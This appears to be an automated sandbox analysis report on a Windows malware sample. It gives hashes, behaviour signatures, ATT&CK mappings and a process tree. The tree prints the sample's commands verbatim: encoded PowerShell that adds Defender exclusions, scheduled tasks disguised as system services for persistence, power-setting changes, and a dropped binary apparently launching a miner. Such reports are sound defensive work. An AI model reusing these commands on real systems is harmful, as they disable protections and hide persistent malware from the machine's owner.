741eed8074530c499fdc24c23ced7a7ed0f300430e00421fe0f9a37cdb52def3

Analysis

max time kernel
22s
max time network
183s
platform
windows10-1703_x64
resource
win10-20230220-en
resource tags

arch:x64arch:x86image:win10-20230220-enlocale:en-usos:windows10-1703-x64system
submitted
12/04/2023, 04:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

741eed8074530c499fdc24c23ced7a7ed0f300430e00421fe0f9a37cdb52def3.exe
Size

295KB
MD5

2bb79ccb8b0c1d91b32f355ac9bbaaa1
SHA1

32a07a3be2700918f585157af2dcbb5075b7f437
SHA256

741eed8074530c499fdc24c23ced7a7ed0f300430e00421fe0f9a37cdb52def3
SHA512

ef776a6ae8e3511e51fadc1127457d8940d661b34ff5088c324237b05688dbd256a9cd0721c5c7ae04e4bad0864e566872dfff573d868adf5e13d566fd0e1105
SSDEEP

6144:6prW2JK/lcRhIzeDtooM9sPKqFIP2+jquE7dn:6p628+RizeDkqFIDSp

Score

8^/10

Malware Config

Signatures

Downloads MZ/PE file

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	AppLaunch.exe

Executes dropped EXE 1 IoCs

pid	Process
2172	dllhost.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 3520 set thread context of 4680	3520	741eed8074530c499fdc24c23ced7a7ed0f300430e00421fe0f9a37cdb52def3.exe	67

Creates scheduled task(s) 1 TTPs 9 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
4456	schtasks.exe
4388	schtasks.exe
2096	schtasks.exe
3892	schtasks.exe
4080	schtasks.exe
2872	schtasks.exe
404	schtasks.exe
4912	schtasks.exe
3544	schtasks.exe

Suspicious behavior: EnumeratesProcesses 14 IoCs

pid	Process
4680	AppLaunch.exe
4656	powershell.exe
4656	powershell.exe
4656	powershell.exe
392	powershell.exe
392	powershell.exe
3260	powershell.exe
3260	powershell.exe
2800	powershell.exe
2800	powershell.exe
3088	powershell.exe
3088	powershell.exe
4820	powershell.exe
4820	powershell.exe

Suspicious use of AdjustPrivilegeToken 15 IoCs

description	pid	Process
Token: SeDebugPrivilege	4680	AppLaunch.exe
Token: SeDebugPrivilege	4656	powershell.exe
Token: SeShutdownPrivilege	5064	powercfg.exe
Token: SeCreatePagefilePrivilege	5064	powercfg.exe
Token: SeShutdownPrivilege	4468	powercfg.exe
Token: SeCreatePagefilePrivilege	4468	powercfg.exe
Token: SeShutdownPrivilege	4476	powercfg.exe
Token: SeCreatePagefilePrivilege	4476	powercfg.exe
Token: SeDebugPrivilege	392	powershell.exe
Token: SeDebugPrivilege	3260	powershell.exe
Token: SeShutdownPrivilege	3908	powercfg.exe
Token: SeCreatePagefilePrivilege	3908	powercfg.exe
Token: SeDebugPrivilege	2800	powershell.exe
Token: SeDebugPrivilege	3088	powershell.exe
Token: SeDebugPrivilege	4820	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3520 wrote to memory of 4680	3520	741eed8074530c499fdc24c23ced7a7ed0f300430e00421fe0f9a37cdb52def3.exe	67
PID 3520 wrote to memory of 4680	3520	741eed8074530c499fdc24c23ced7a7ed0f300430e00421fe0f9a37cdb52def3.exe	67
PID 3520 wrote to memory of 4680	3520	741eed8074530c499fdc24c23ced7a7ed0f300430e00421fe0f9a37cdb52def3.exe	67
PID 3520 wrote to memory of 4680	3520	741eed8074530c499fdc24c23ced7a7ed0f300430e00421fe0f9a37cdb52def3.exe	67
PID 3520 wrote to memory of 4680	3520	741eed8074530c499fdc24c23ced7a7ed0f300430e00421fe0f9a37cdb52def3.exe	67
PID 4680 wrote to memory of 3784	4680	AppLaunch.exe	69
PID 4680 wrote to memory of 3784	4680	AppLaunch.exe	69
PID 4680 wrote to memory of 3784	4680	AppLaunch.exe	69
PID 3784 wrote to memory of 4656	3784	cmd.exe	71
PID 3784 wrote to memory of 4656	3784	cmd.exe	71
PID 3784 wrote to memory of 4656	3784	cmd.exe	71
PID 4680 wrote to memory of 2172	4680	AppLaunch.exe	72
PID 4680 wrote to memory of 2172	4680	AppLaunch.exe	72
PID 4680 wrote to memory of 2172	4680	AppLaunch.exe	72
PID 4680 wrote to memory of 1424	4680	AppLaunch.exe	94
PID 4680 wrote to memory of 1424	4680	AppLaunch.exe	94
PID 4680 wrote to memory of 1424	4680	AppLaunch.exe	94
PID 4680 wrote to memory of 1232	4680	AppLaunch.exe	93
PID 4680 wrote to memory of 1232	4680	AppLaunch.exe	93
PID 4680 wrote to memory of 1232	4680	AppLaunch.exe	93
PID 4680 wrote to memory of 2364	4680	AppLaunch.exe	92
PID 4680 wrote to memory of 2364	4680	AppLaunch.exe	92
PID 4680 wrote to memory of 2364	4680	AppLaunch.exe	92
PID 4680 wrote to memory of 1340	4680	AppLaunch.exe	91
PID 4680 wrote to memory of 1340	4680	AppLaunch.exe	91
PID 4680 wrote to memory of 1340	4680	AppLaunch.exe	91
PID 4680 wrote to memory of 2504	4680	AppLaunch.exe	90
PID 4680 wrote to memory of 2504	4680	AppLaunch.exe	90
PID 4680 wrote to memory of 2504	4680	AppLaunch.exe	90
PID 4680 wrote to memory of 2540	4680	AppLaunch.exe	89
PID 4680 wrote to memory of 2540	4680	AppLaunch.exe	89
PID 4680 wrote to memory of 2540	4680	AppLaunch.exe	89
PID 4680 wrote to memory of 2532	4680	AppLaunch.exe	88
PID 4680 wrote to memory of 2532	4680	AppLaunch.exe	88
PID 4680 wrote to memory of 2532	4680	AppLaunch.exe	88
PID 4680 wrote to memory of 2520	4680	AppLaunch.exe	87
PID 4680 wrote to memory of 2520	4680	AppLaunch.exe	87
PID 4680 wrote to memory of 2520	4680	AppLaunch.exe	87
PID 4680 wrote to memory of 3644	4680	AppLaunch.exe	86
PID 4680 wrote to memory of 3644	4680	AppLaunch.exe	86
PID 4680 wrote to memory of 3644	4680	AppLaunch.exe	86
PID 4680 wrote to memory of 700	4680	AppLaunch.exe	85
PID 4680 wrote to memory of 700	4680	AppLaunch.exe	85
PID 4680 wrote to memory of 700	4680	AppLaunch.exe	85
PID 4680 wrote to memory of 1096	4680	AppLaunch.exe	84
PID 4680 wrote to memory of 1096	4680	AppLaunch.exe	84
PID 4680 wrote to memory of 1096	4680	AppLaunch.exe	84
PID 4680 wrote to memory of 4236	4680	AppLaunch.exe	75
PID 4680 wrote to memory of 4236	4680	AppLaunch.exe	75
PID 4680 wrote to memory of 4236	4680	AppLaunch.exe	75
PID 4680 wrote to memory of 4240	4680	AppLaunch.exe	73
PID 4680 wrote to memory of 4240	4680	AppLaunch.exe	73
PID 4680 wrote to memory of 4240	4680	AppLaunch.exe	73
PID 4680 wrote to memory of 2248	4680	AppLaunch.exe	74
PID 4680 wrote to memory of 2248	4680	AppLaunch.exe	74
PID 4680 wrote to memory of 2248	4680	AppLaunch.exe	74
PID 1424 wrote to memory of 3892	1424	cmd.exe	102
PID 1424 wrote to memory of 3892	1424	cmd.exe	102
PID 1424 wrote to memory of 3892	1424	cmd.exe	102
PID 700 wrote to memory of 392	700	cmd.exe	101
PID 700 wrote to memory of 392	700	cmd.exe	101
PID 700 wrote to memory of 392	700	cmd.exe	101
PID 1340 wrote to memory of 404	1340	cmd.exe	103
PID 1340 wrote to memory of 404	1340	cmd.exe	103

C:\Users\Admin\AppData\Local\Temp\741eed8074530c499fdc24c23ced7a7ed0f300430e00421fe0f9a37cdb52def3.exe
"C:\Users\Admin\AppData\Local\Temp\741eed8074530c499fdc24c23ced7a7ed0f300430e00421fe0f9a37cdb52def3.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3520
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
  "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe"
  2⤵
  - Drops file in Drivers directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4680
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C powershell -EncodedCommand "PAAjAGoARgB6AGoAdAAwAFMAUQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAEoAQwBLADQAcwBnACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAWABGAGQAWgBPACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjADYARgBvADMAegAwAE8AQQB2AE4ASwBRAHMAYQAwACMAPgA="
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3784
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -EncodedCommand "PAAjAGoARgB6AGoAdAAwAFMAUQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAEoAQwBLADQAcwBnACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGsAWABGAGQAWgBPACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjADYARgBvADMAegAwAE8AQQB2AE4ASwBRAHMAYQAwACMAPgA="
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4656
- - C:\ProgramData\Dllhost\dllhost.exe
    "C:\ProgramData\Dllhost\dllhost.exe"
    3⤵
    - Executes dropped EXE
    PID:2172
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json
      4⤵
      PID:4080
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json
      4⤵
      PID:2412
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json
      4⤵
      PID:4160
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json
      4⤵
      PID:3296
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json
      4⤵
      PID:5048
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json
      4⤵
      PID:4324
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C powershell -EncodedCommand "PAAjAE0EQQByAGcAEARBAGEAUwAsBEQESgBmADIAYQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAD8EdQBwAE4AIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjAG0AUwAhBFEATAQVBDMAZAA4BCMAPgAgAEAAKAAgADwAIwBlAHEATAAwBEIAGgQzAD4EIwA+ACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACAAPAAjACMEeAAkBBQEZAA4BCwEEQRrAHAALQQhBEIASQBOBCMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwBPAEgAKARPAGwAIwQsBD4EOQRIBHMATgQXBCMAPgAgAC0ARgBvAHIAYwBlACAAPAAjADAAdwA1BHIAMwRRAEYAMwAtBD8EGQQdBCMAPgA="
    3⤵
    PID:4240
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -EncodedCommand "PAAjAE0EQQByAGcAEARBAGEAUwAsBEQESgBmADIAYQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAD8EdQBwAE4AIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjAG0AUwAhBFEATAQVBDMAZAA4BCMAPgAgAEAAKAAgADwAIwBlAHEATAAwBEIAGgQzAD4EIwA+ACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACAAPAAjACMEeAAkBBQEZAA4BCwEEQRrAHAALQQhBEIASQBOBCMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwBPAEgAKARPAGwAIwQsBD4EOQRIBHMATgQXBCMAPgAgAC0ARgBvAHIAYwBlACAAPAAjADAAdwA1BHIAMwRRAEYAMwAtBD8EGQQdBCMAPgA="
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3088
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off & echo ДЕгЗВшЕ & SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo уоNОЮAz07зDvMиЙ1j
    3⤵
    PID:2248
  - - C:\Windows\SysWOW64\powercfg.exe
      powercfg /x -hibernate-timeout-ac 0
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:5064
  - - C:\Windows\SysWOW64\powercfg.exe
      powercfg /x -hibernate-timeout-dc 0
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4468
  - - C:\Windows\SysWOW64\powercfg.exe
      powercfg /x -standby-timeout-ac 0
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4476
  - - C:\Windows\SysWOW64\powercfg.exe
      powercfg /x -standby-timeout-dc 0
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3908
  - - C:\Windows\SysWOW64\powercfg.exe
      powercfg /hibernate off
      4⤵
      PID:3708
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
      4⤵
      Creates scheduled task(s)
      PID:2096
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C powershell -EncodedCommand "PAAjAEoERQQmBCkEGQRnADkELwQ4BD0EKQQjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAEoEEQQ+BFgALAQ4ABkEIgQjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAEARhAEIAFgQjBDcAIwA+ACAAQAAoACAAPAAjAGoAMQRRADAESgQiBC4EMAQiBB4EdgB6ACsEIwA+ACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACAAPAAjAEoATARMAEYASQRQABkEQQA1BFAARwAyBFYAQgRFBCMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwAeBCwESgRBBCsEIgR5AHkAHgQjAD4AIAAtAEYAbwByAGMAZQAgADwAIwAuBGMAMQBsAE0ASARvAFEASgRJACMAPgA="
    3⤵
    PID:4236
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -EncodedCommand "PAAjAEoERQQmBCkEGQRnADkELwQ4BD0EKQQjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAEoEEQQ+BFgALAQ4ABkEIgQjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAEARhAEIAFgQjBDcAIwA+ACAAQAAoACAAPAAjAGoAMQRRADAESgQiBC4EMAQiBB4EdgB6ACsEIwA+ACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACAAPAAjAEoATARMAEYASQRQABkEQQA1BFAARwAyBFYAQgRFBCMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwAeBCwESgRBBCsEIgR5AHkAHgQjAD4AIAAtAEYAbwByAGMAZQAgADwAIwAuBGMAMQBsAE0ASARvAFEASgRJACMAPgA="
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3260
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C powershell -EncodedCommand "PAAjAGIAZgAXBHUASgRsAGYAOgQnBBwEIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBVAFgAHwRDADEEeQBBAGMAGwQjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAMwAkBGwANQA2BCoERwQwBCEERwQyAD4ERgBJBCMAPgAgAEAAKAAgADwAIwBwAEcEWQBiAE8AQwASBEkAUAA7BBQEFQR5ACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBFAHQAPwR1AE0ERQR5ADEEPAQtBEcAIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQApACAAPAAjABQEEQRIAG4ATARyACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAFgAMgRGBCkEYgBFBCMAPgA="
    3⤵
    PID:1096
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -EncodedCommand "PAAjAGIAZgAXBHUASgRsAGYAOgQnBBwEIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBVAFgAHwRDADEEeQBBAGMAGwQjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAMwAkBGwANQA2BCoERwQwBCEERwQyAD4ERgBJBCMAPgAgAEAAKAAgADwAIwBwAEcEWQBiAE8AQwASBEkAUAA7BBQEFQR5ACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwBFAHQAPwR1AE0ERQR5ADEEPAQtBEcAIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQApACAAPAAjABQEEQRIAG4ATARyACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAFgAMgRGBCkEYgBFBCMAPgA="
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4820
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C powershell -EncodedCommand "PAAjAG4ANQRrADcASAQjBFAASQBGACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAGgQ+BEgEIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjAHQAMwRPAGEAMARqAEUANABuAE8EIwA+ACAAQAAoACAAPAAjAHgAcAAjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMATwREAGoAHAQ3ACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwA5BG4AYwBXAGcAagA8BCsERQQfBCEEJAQsBG0AVQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwATBEMAEARjAE0ANAQwAFoAMgBUAD4EaAAjAD4A"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:700
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -EncodedCommand "PAAjAG4ANQRrADcASAQjBFAASQBGACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAGgQ+BEgEIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjAHQAMwRPAGEAMARqAEUANABuAE8EIwA+ACAAQAAoACAAPAAjAHgAcAAjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMATwREAGoAHAQ3ACMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwA5BG4AYwBXAGcAagA8BCsERQQfBCEEJAQsBG0AVQAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwATBEMAEARjAE0ANAQwAFoAMgBUAD4EaAAjAD4A"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:392
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C powershell -EncodedCommand "PAAjAEwAJAQnBHgAFgRYAD8EOAARBEgANwRvAEYAMAQyACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAegBpAHkAHQQ0BCMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgADwAIwAyBDUAbQBVACMAPgAgAEAAKAAgADwAIwBtAFgAOgRCBCgEIwA+ACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACAAPAAjACIEVABOADMASQQ6BDIEQARuACsESwQqBGQAIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQApACAAPAAjACUELgRCBCMAPgAgAC0ARgBvAHIAYwBlACAAPAAjADUERwQ6BEwAcABEADkAbAAjAD4A"
    3⤵
    PID:3644
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -EncodedCommand "PAAjAEwAJAQnBHgAFgRYAD8EOAARBEgANwRvAEYAMAQyACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAegBpAHkAHQQ0BCMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgADwAIwAyBDUAbQBVACMAPgAgAEAAKAAgADwAIwBtAFgAOgRCBCgEIwA+ACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACAAPAAjACIEVABOADMASQQ6BDIEQARuACsESwQqBGQAIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQApACAAPAAjACUELgRCBCMAPgAgAC0ARgBvAHIAYwBlACAAPAAjADUERwQ6BEwAcABEADkAbAAjAD4A"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2800
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C echo фЪАZr & SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo 32ЧяыПM
    3⤵
    PID:2520
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
      4⤵
      Creates scheduled task(s)
      PID:4388
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C echo b7ВE & SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo ьнQyNчlЭдtWЙ3Ю
    3⤵
    PID:2532
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
      4⤵
      Creates scheduled task(s)
      PID:4456
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C echo 2жotЗxъGAvIъвСцx & SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo
    3⤵
    PID:2540
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
      4⤵
      Creates scheduled task(s)
      PID:3544
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C echo 5pТ7xxmn00d4жS & SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo иbгрmhTzNN
    3⤵
    PID:2504
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
      4⤵
      Creates scheduled task(s)
      PID:4912
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C echo АSEOdМшммbЮaжLEg & SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo rвK7жfЭкфK2гРХ0
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1340
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
      4⤵
      Creates scheduled task(s)
      PID:404
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C echo nJ & SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo PиуBhдppf4жbФМiPКмS
    3⤵
    PID:2364
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
      4⤵
      Creates scheduled task(s)
      PID:4080
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C echo урlЧOЖаpnЧKз & SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo LSжСыЕkUxыrWаBы
    3⤵
    PID:1232
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
      4⤵
      Creates scheduled task(s)
      PID:2872
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C echo ф4e & SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo зКСrкЪрpUM1д2
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1424
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
      4⤵
      Creates scheduled task(s)
      PID:3892

C:\ProgramData\Dllhost\dllhost.exe
C:\ProgramData\Dllhost\dllhost.exe
1⤵
PID:4588

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Web Service

T1102

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Dllhost\dllhost.exe

Filesize
62KB

MD5
e72d497c94bb1ed882ac98931f70e82e

SHA1
85c2c44e4addbdde87b49b33e252772126f9544e

SHA256
d2e371810e8c7b1e039a02a578b1af0c6250665e85206b97a1ecb71aa5568443

SHA512
78c71c5dc299146358140498d77a162e05265e40041aabdec0fd1a18624278117032f1a62918d1041b430dac3664658a37ec49fe2de5bae3bfe6d6cb7a5c3c4e

Download Submit
C:\ProgramData\Dllhost\dllhost.exe

Filesize
62KB

MD5
e72d497c94bb1ed882ac98931f70e82e

SHA1
85c2c44e4addbdde87b49b33e252772126f9544e

SHA256
d2e371810e8c7b1e039a02a578b1af0c6250665e85206b97a1ecb71aa5568443

SHA512
78c71c5dc299146358140498d77a162e05265e40041aabdec0fd1a18624278117032f1a62918d1041b430dac3664658a37ec49fe2de5bae3bfe6d6cb7a5c3c4e

Download Submit
C:\ProgramData\Dllhost\dllhost.exe

Filesize
62KB

MD5
e72d497c94bb1ed882ac98931f70e82e

SHA1
85c2c44e4addbdde87b49b33e252772126f9544e

SHA256
d2e371810e8c7b1e039a02a578b1af0c6250665e85206b97a1ecb71aa5568443

SHA512
78c71c5dc299146358140498d77a162e05265e40041aabdec0fd1a18624278117032f1a62918d1041b430dac3664658a37ec49fe2de5bae3bfe6d6cb7a5c3c4e

Download Submit
C:\ProgramData\HostData\logs.uce

Filesize
343B

MD5
5a2812b775b17bc721ec808fe46cccdc

SHA1
b186895e093bffa131a3a7f936d75c8314f7ae2f

SHA256
72e122375917d4465af3bcd15d2dc5e0f6cb96a3a2f1fa5681d4fd512de79bba

SHA512
8693113b17a106f73cc3563dc8894d65a6a215d5de72547bf64791b04f734749c34b242a0c87651d1374eb30938ec134ce120fe4fb15292dffa44b294c9afce7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
1c19c16e21c97ed42d5beabc93391fc5

SHA1
8ad83f8e0b3acf8dfbbf87931e41f0d664c4df68

SHA256
1bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05

SHA512
